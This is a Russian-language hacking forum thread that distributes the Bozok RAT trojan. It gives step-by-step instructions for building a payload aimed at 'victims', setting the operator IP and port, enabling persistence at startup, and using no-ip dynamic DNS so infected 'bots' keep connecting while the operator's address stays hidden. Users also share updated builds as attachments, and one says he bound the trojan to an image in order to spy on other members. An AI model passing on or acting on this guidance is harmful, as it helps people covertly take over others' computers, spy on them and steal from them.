• Привет !

    На форуме есть зеркало в ТОРе:rusfwz3cukdej7do.onion

    Обратная связь:info@ru-sfera.org

    Всего доброго !

Bozok 1.5 (Не плохой троян категории RAT+ Описание и принцип) (1 Viewer)

Кто просматривает этот контент: "Тема" (Всего пользователей: 0; Гостей: 1)

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 399
Репутация
7 885
Telegram
Хороший троян разновидности RAT (Remote Administration Tool), включают в себя все необходимые функции для подобного типа троянов, управления файлами, процессами и сервисами, управление реестром, забор изображение с камеры и с экрана монитора, короче всё самое лучшее в традициях RAT.

GyUnRY1.png


Использование:

Запускаем, жмём на иконку "ключ", левый нижней угол, (Build) , в открывшемся окне вводим данные. Добавляем свой IP в нижнем секторе вкладки "Connections"(правым щелчком мыши) вводим ip машины на которые будете получать данные с жертвы, заполняем поле пароля и поле порта по дефолту стоит порт 1515, обратите внимание на то что данный порт должен быть у вас открыт, думаю вы найдёте информацию как открыть порт, поэтому заострять внимание на этом не буду.

Далее в следующих вкладках идут вторичные функции, с которыми вы думаю разберётесь сами, но стоит уделить внимание вкладке Startup, эта вкладка добавляет функцию автозапуска нашего трояна, как она работает, при активной функции, троян будет запускаться при старте с Windows в случаях если жертва перезагрузит компьютер , если же эта функция не активна, то троян запускается только один раз, когда жертва нажмёт на ваш файлик с сюрпризом.

Предположим сделали билд по дефолту билд создаётся в папку с клиентом, проверяем работоспособность, запускаем наш билд далее открываем клиент Bozok и жмём на шестерёнку "Settings" вводим порт который вы водили при конструкции билда по дефолту порт 1515, и пароль если ваш компьютер отобразился то всё работает, если же нет, то проверьте правильность ввода данных в билде и настройках, а также проверьте открыт ли порт который вы указали.

Есть русский язык, пароль 111 ! ;)
 

Вложения

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 775
Что-то нихера связь не устанавливается с трояном.Я уже фаер и так и эдак ворочал-нифига.Сейчас буду нового Комодо ставить,заодно и попробую без фаера всю эту дребедень запустить.А вот кто захочет может подразнить этого трояна скленного с картинкой (может связь наладится и тоды буду в ваши браузеры зырить).Пароль:111
 

Вложения

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 775
И что много ботов насобирал, 4-ре скачавших уже !Отдыхай!!!
Да никто походу его не запускает.Да и нормальный антивирь сразу же его пристукнет,а если и не пристукнет,то фаер придушит.
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 775
Сегодня по всем хак-ресурсам выложен обновлённый Bozok 1.5.1.Я подумал,а чем мы хуже.Вон,уже 16 раз скачан .Обновляйтесь,уважаемые "бозоководы"!
1.gif


Изменения в новой версии:
- changed handshake
- tweaks on installation routine
- fixes on connection
- non-blocking sockets on client-side
- added Groups
- added Sidebar
- small changes in GUI
- timeout bug fixed
Пасс на архив:111
 

Вложения

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 775
Почему он тут пишет не сам ip в настройках?
Потому что для работы трояна нужен статический айпи,а не динамический.Ведь динамический айпи,постоянно изменяется,например при перезагрузке модема и троян привязанный к такому айпишнику уже не сможет связаться с хозяином,так как будет "стучать" по старому адресу.Поэтому и применяется данный сервис для создания статичного адреса.А синхронизация твоего динамического айпишника и адреса выданного сервисом происходит с помощью небольшого клиента,в который ты должен ввести данные аккаунта на no-ip .
Снимок.PNG

Но если у тебя статический айпишник можешь смело его вводить.Правда если трояныч попадёт не простой "жертве",а челу поумнее он сможет увидеть твой айпишник,например через Process Hacker.
 

ewwa

Уважаемый пользователь
Форумчанин
Регистрация
19.02.2014
Сообщения
104
Репутация
144
Я прописывал no-ip и при статическом, мало ли провайдер ченить намутит и все боты отвалятся. no-ip при не активности через какое то время удаляет аккаунт dyndns нет вроде, его можно один адрес на халяву получить, какая то акция zyxel.
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 775
Я прописывал no-ip и при статическом,
Согласен с ewwa.Хоть и через no-ip можно получить информацию об айпишнике "злоумышленника",но всё же такой вариант,более приемлиемый.
Так что,rinavat, юзай no-ip вне зависимости от того,какой у тебя айпи.